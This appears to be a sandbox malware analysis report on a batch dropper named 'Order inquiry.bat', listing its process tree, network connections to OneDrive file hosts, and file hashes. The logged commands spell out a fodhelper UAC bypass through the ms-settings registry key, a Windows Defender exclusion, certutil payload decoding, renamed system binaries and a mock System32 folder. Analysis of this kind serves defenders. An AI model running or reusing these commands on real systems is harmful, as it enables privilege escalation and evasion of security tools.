PID 2072 wrote to memory of 4084 N/A C:\Windows \System32\1177894.exe C:\Windows\system32\cmd.exe
PID 4084 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4084 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\fodhelper.exe

"C:\Windows\system32\fodhelper.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\1177894.exe"

C:\Windows \System32\1177894.exe

"C:\Windows \System32\1177894.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

C:\Windows\system32\cmd.exe

cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Othwubnr.PIF

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat

Network

Country Destination Domain Proto
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.137.11:443 onedrive.live.com tcp
US 13.107.137.11:443 onedrive.live.com tcp
US 8.8.8.8:53 hgitta.dm.files.1drv.com udp
US 13.107.42.12:443 hgitta.dm.files.1drv.com tcp
US 8.8.8.8:53 11.137.107.13.in-addr.arpa udp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Public\alpha.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

C:\Users\Public\xkn.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/2852-21-0x0000029A73F80000-0x0000029A73FA2000-memory.dmp

memory/2852-23-0x00007FFA30E30000-0x00007FFA3181C000-memory.dmp

memory/2852-25-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-26-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-29-0x0000029A74290000-0x0000029A74306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyi3ttcc.wqt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2852-52-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-56-0x00007FFA30E30000-0x00007FFA3181C000-memory.dmp

C:\Users\Public\kn.exe

MD5 4906f49c4e1fc1015565ef490f2f21e0
SHA1 c9e581a4df721a9414b5cb6edf75c310c29bc20b
SHA256 628ff4680652865151ecc8ae2728a6bd67b939e83220909275188a55c480dc17
SHA512 2704531f8e50c856f8f2648e91e3cd97a7d7da46597e8a69bcd958a660f151084e5de6d937e768b7fdca0e118710d0737a03871931228f41dc7764e611d9c2b5

C:\Users\Public\kn.exe

MD5 056c7d065f4622da9cc2848f47e2bae2
SHA1 6c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256 e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512 db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

C:\Users\Public\Lewxa.txt

MD5 5e3260366c3c643511ba9d5f0bffefd4
SHA1 ef84ae0ed0a835dda0c8ebab1c166e95e8da1403
SHA256 41d8ce140db1ab125f33ac3e8603d01fd85191b37b41314808cb29e069dd4243
SHA512 46e1a3f630e0710bb182a0d9cc1876d7df725c818342def0ed1a657cc6b79b9c996ae483d09357344234d725a10c4af037e67ece32293b63fcb4bf7c932acfc7

C:\Users\Public\Libraries\Lewxa.com

MD5 aa6d1a831ba292e2670da589b8aea980
SHA1 fe61d016a11a1ea9b85bec7139d44b1acbb6bfcd
SHA256 f5cd840346c9d16181109ba81cd4206e46f87682799b54eaa0f3cb4689a7d05d
SHA512 d0eaa2933b75d9114714ecf6c0f04b1bc4396ee570759bc3d7bfca7426f039d0234ffc6791de66332ce5682dfbc5a6daa1fbb252b68e67c65362e42a5a295c08

memory/2480-72-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/2480-77-0x0000000004130000-0x0000000005130000-memory.dmp

memory/2480-79-0x0000000004130000-0x0000000005130000-memory.dmp

memory/2480-81-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2480-82-0x00000000007C0000-0x00000000007C1000-memory.dmp

C:\Windows \System32\1177894.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

C:\Windows \System32\netutils.dll

MD5 fa7aa88417d0c48807144a1a48fe3fbc
SHA1 6f5ec990b12d4a6075050a94e0d68d03781fa46d
SHA256 2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098
SHA512 99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff

memory/2072-95-0x00000000613C0000-0x00000000613E3000-memory.dmp

C:\windows \system32\KDECO.bat

MD5 c545650595b479c81ad6b9d8882aae39
SHA1 7a98aa2e6eee23b3c1bba876955d525bc618b3f0
SHA256 a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9
SHA512 85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3

memory/4112-101-0x00007FFA304F0000-0x00007FFA30EDC000-memory.dmp

memory/4112-102-0x000001B44C680000-0x000001B44C690000-memory.dmp

memory/4112-103-0x000001B44C680000-0x000001B44C690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57f54ca96ff7c5a70b0791a3b3694723
SHA1 e264cbc90400011f9162408d5ef5e58d41794fdf
SHA256 0f1a6aaec264f27eee7bb190bbc06daca8303d9e6455100b9cc5fcfaad5b0b06
SHA512 fc3347fe3bcd3b7f0bc05424dbd9e58496437f3c9f44125ea9c2bcc80f34f80a37ee2c7c62c8680ac1f6496b8e42d61122167d487e527c8b85f1f59bdf5b8293

memory/4112-119-0x000001B44C680000-0x000001B44C690000-memory.dmp

memory/4112-145-0x00007FFA304F0000-0x00007FFA30EDC000-memory.dmp

memory/5100-152-0x0000000000260000-0x0000000000298000-memory.dmp

memory/5100-153-0x0000000000260000-0x0000000000298000-memory.dmp

memory/5100-155-0x0000000000260000-0x0000000000298000-memory.dmp